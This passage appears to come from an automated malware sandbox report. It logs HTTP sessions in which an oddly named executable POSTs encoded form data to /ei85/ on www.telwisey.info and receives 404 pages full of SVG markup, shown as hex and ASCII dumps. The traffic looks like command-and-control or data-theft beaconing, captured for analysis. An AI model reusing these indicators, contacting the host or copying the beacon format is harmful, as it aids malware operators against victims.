                                          Jul 4, 2024 16:54:46.924423933 CEST1236INData Raw: 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: 8-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                          Jul 4, 2024 16:54:46.924436092 CEST1236INData Raw: 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20 79 31 3d 22 31 34 33 2e 33 34 39 22
                                          Data Ascii: necap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="rou
                                          Jul 4, 2024 16:54:46.924547911 CEST672INData Raw: 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                                          Data Ascii: 4" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g> <g>
                                          Jul 4, 2024 16:54:46.924598932 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                          Jul 4, 2024 16:54:46.924608946 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                          Jul 4, 2024 16:54:46.924618959 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                          Jul 4, 2024 16:54:46.924734116 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                          Jul 4, 2024 16:54:46.929291010 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.749729199.192.19.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:48.852255106 CEST807OUTPOST /ei85/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.telwisey.info
                                          Origin: http://www.telwisey.info
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.telwisey.info/ei85/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 59 58 43 52 59 49 2f 45 2b 56 34 33 49 59 2b 55 44 57 43 42 79 47 7a 46 71 59 4d 52 39 4c 54 58 56 32 55 50 6b 69 77 6e 5a 72 36 2f 39 55 7a 4a 67 3d
                                          Data Ascii: YbCL=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/YXCRYI/E+V43IY+UDWCByGzFqYMR9LTXV2UPkiwnZr6/9UzJg=
                                          Jul 4, 2024 16:54:49.483876944 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:49 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                          Jul 4, 2024 16:54:49.483983994 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                          Jul 4, 2024 16:54:49.483998060 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                          Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                          Jul 4, 2024 16:54:49.484078884 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                          Jul 4, 2024 16:54:49.484092951 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                                          Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                                          Jul 4, 2024 16:54:49.484103918 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                          Jul 4, 2024 16:54:49.484116077 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                          Jul 4, 2024 16:54:49.484122992 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                          Jul 4, 2024 16:54:49.484318972 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                          Jul 4, 2024 16:54:49.484354019 CEST224INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
                                          Jul 4, 2024 16:54:49.488981962 CEST1236INData Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20
                                          Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.749730199.192.19.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:51.426166058 CEST1820OUTPOST /ei85/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.telwisey.info
                                          Origin: http://www.telwisey.info
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.telwisey.info/ei85/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 51 4d 6a 49 44 30 37 73 78 72 59 4d 30 2b 44 44 59 34 79 58 53 41 38 47 4e 67 78 6a 76 36 4c 69 72 39 77 6b 32 6f 4a 6e 56 4e 53 6b 68 44 55 4d 67 32 78 79 59 7a 76 74 67 58 74 6f 6e 34 71 6a 68 44 75 4c 6a 4d 5a 52 78 55 5a 61 46 61 74 61 47 4d 41 32 35 49 52 72 70 72 64 46 4d 68 43 62 31 73 43 4c 36 6e 54 4c 43 5a 33 75 72 69 71 63 71 38 4e 75 32 4d 45 6a 2b 53 37 61 4c 39 35 58 73 4a 30 38 77 48 73 49 77 51 51 32 31 7a 76 2b 79 75 47 47 57 64 33 44 6b 68 51 4a 65 45 2f 6f 34 73 77 [TRUNCATED]
                                          Data Ascii: YbCL=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6QMjID07sxrYM0+DDY4yXSA8GNgxjv6Lir9wk2oJnVNSkhDUMg2xyYzvtgXton4qjhDuLjMZRxUZaFataGMA25IRrprdFMhCb1sCL6nTLCZ3uriqcq8Nu2MEj+S7aL95XsJ08wHsIwQQ21zv+yuGGWd3DkhQJeE/o4swj7QO4QELvu/Lh9v9NVtL2WAc7iye1TFFKZpXK1JoHkpENODrCCUgYFDn5a+RZV6OyL2/CM9UwEMhuz5+l8/Y9WMc58YAYRBKQg9ETS93L6DbPnFM14a5JnXFh+g9sR4mYCtlraRZ/qTWiFNxEv4Ea4sX5yZfY4JRWhgyDmN/FpLzvswApuqUyGbF5cjJ8gSbF1leRTSgdmYGp2g7t8DPvizm0kYEcHS732iiVXZKqbuf2ZWtm/bLOnmkD2Wr+0JtShqa+kHx+hB/EEL0vdQd9eRKq+RUeQHU+72QjB18yXM6kmp3bQj/0kO0Ms+tdOGo4ukRsd8Vy9P5mj6vQ597VBbFDPZNO2rc1gh0dyOOx+B6nV1GD+Wnny6/dJHm8XybMP9t5j+mobr5DjK06wrli+ux6+ynON1vrrWAddpj2q6dzKOR0r7Yu2OSlh7TpGFkOeRCr8oDuxZEnfAaanIiWnFruH6aRET0j7LVcb6LlnoMJnzxS2AMtP8Ve80ao+dF7ux4Cfg9Q8l6S1AOVmIgjay8AJwmLKEf1okFCkviIiVP6qWcNnYYAdsLAYYwMxiQzwFU/qWVEsW7fFXqfSMnIgMXnxonXM5ao8mQACpwTE7KZpURxmy84wEkk0sK6Y08SDt/orLJVlZvphCoxGyjXN3A0WQsqEsnLY [TRUNCATED]
                                          Jul 4, 2024 16:54:52.051856041 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:51 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                          Jul 4, 2024 16:54:52.051881075 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                          Jul 4, 2024 16:54:52.051893950 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                          Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                          Jul 4, 2024 16:54:52.051987886 CEST672INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                          Jul 4, 2024 16:54:52.052002907 CEST1236INData Raw: 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33 22 20 79 32 3d 22 34 39 33 2e 37 31 33 22 20
                                          Data Ascii: limit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0620" stroke-wid
                                          Jul 4, 2024 16:54:52.052015066 CEST224INData Raw: 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g>
                                          Jul 4, 2024 16:54:52.052026987 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                          Jul 4, 2024 16:54:52.052040100 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                          Jul 4, 2024 16:54:52.052053928 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
